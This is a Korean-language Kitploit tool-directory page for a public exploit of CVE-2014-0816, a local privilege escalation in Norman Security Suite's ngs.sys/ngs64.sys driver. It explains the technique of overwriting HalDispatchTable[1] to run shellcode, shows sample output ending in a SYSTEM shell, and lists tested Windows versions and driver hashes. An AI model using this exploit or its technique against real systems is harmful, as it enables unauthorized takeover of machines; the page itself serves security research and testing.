Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2014-0816 — CVE-2014-0816 | Kitploit
도구/GitHubGitHub/tandasat/cve-2014-0816
Privilege EscalationVulnerability AnalysisExploitationBinary Exploitation
GitHubtandasat/cve-2014-0816

CVE-2014-0816

CVE-2014-0816

저장소 보기
25109년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2014-0816

이것은 CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite에서 권한 상승 취약점)에 대한 익스플로잇입니다.

이 익스플로잇은 ngs.sys / ngs64.sys의 IOCTL 핸들러 취약점을 이용하여 비관리자 권한에서 SYSTEM 권한으로 CMD.exe를 실행합니다.

사용법

root@kitploit:~
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.

그러면 새 콘솔이 나타납니다.

root@kitploit:~
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

이 취약점을 통해 공격자는 임의의 주소에 임의의 값을 덮어쓸 수 있으므로, 이 익스플로잇은 HalDispatchTable[1]의 값을 현재 프로세스의 권한을 SYSTEM 권한으로 상승시키는 쉘코드의 주소로 변경합니다.

demo_win7_x64

이 취약점은 Windows XP부터 8까지 x86/x64 모든 플랫폼에서 악용 가능하지만, 이 익스플로잇은 특정 플랫폼에서만 설계 및 테스트되었습니다 (예: SMEP 때문에 Windows 8에서는 작동하지 않습니다).

테스트된 플랫폼

  • Norman Security Suite 10.1
  • 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
  • 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
  • d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
  • fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
  • Windows XP (x86) SP3 (Guest 권한)
  • Windows 7 (x86/x64) SP1 (Guest 권한)
  • Windows 10 (x64) Build 14393 (Guest 권한, SMEP 비활성화)

라이선스

이 소프트웨어는 MIT 라이선스로 제공됩니다. LICENSE 파일을 참조하십시오.

도구 다운로드